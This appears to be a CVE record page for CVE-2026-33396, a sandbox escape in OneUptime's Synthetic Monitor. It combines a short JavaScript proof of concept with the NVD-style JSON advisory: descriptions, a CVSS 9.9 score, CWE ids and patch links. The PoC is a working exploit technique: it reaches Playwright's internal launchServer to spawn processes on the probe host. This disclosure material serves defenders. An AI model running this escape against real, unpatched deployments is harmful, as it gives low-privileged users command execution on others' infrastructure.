CVE-2026-33396

// PoC for CVE-2026-33396 // Exploits incomplete denylist in OneUptime Synthetic Monitor // Requires ProjectMember privileges async function exploit() { // The context provides a live Playwright page object const page = global.page; // Bypass the sandbox by accessing the internal browser type // The denylist failed to block '_browserType' and 'launchServer' const browserType = page.context().browser()._browserType; // Spawn an arbitrary process on the host/container // Example: Launching a server or executing a command await browserType.launchServer({ args: ['--no-sandbox', 'touch', '/tmp/pwned'] }); } exploit();

{"cve": {"id": "CVE-2026-33396", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:13.310", "lastModified": "2026-03-26T20:40:52.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.35, a low-privileged authenticated user (ProjectMember) can achieve remote command execution on the Probe container/host by abusing Synthetic Monitor Playwright script execution. Synthetic monitor code is executed in VMRunner.runCodeInNodeVM with a live Playwright page object in context. The sandbox relies on a denylist of blocked properties/methods, but it is incomplete. Specifically, _browserType and launchServer are not blocked, so attacker code can traverse `page.context().browser()._browserType.launchServer(...)` and spawn arbitrary processes. Version 10.0.35 contains a patch."}, {"lang": "es", "value": "OneUptime es una plataforma de monitoreo y observabilidad de código abierto. Antes de la versión 10.0.35, un usuario autenticado con bajos privilegios (ProjectMember) puede lograr la ejecución remota de comandos en el contenedor/host de Probe abusando de la ejecución de scripts de Playwright del Monitor Sintético. El código del monitor sintético se ejecuta en VMRunner.runCodeInNodeVM con un objeto de página de Playwright en vivo en contexto. El sandbox se basa en una lista de denegación de propiedades/métodos bloqueados, pero está incompleta. Específicamente, _browserType y launchServer no están bloqueados, por lo que el código del atacante puede recorrer 'page.context().browser()._browserType.launchServer(...)' y generar procesos arbitrarios. La versión 10.0.35 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.35", "matchCriteriaId": "BE6EDDCA-31EC-4458-ACF2-9FA51FAE4FAE"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/commit/e8e4ee3ff0740eb131045ab3d67453141c46178a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-cqpg-phpp-9jjg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-cqpg-phpp-9jjg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}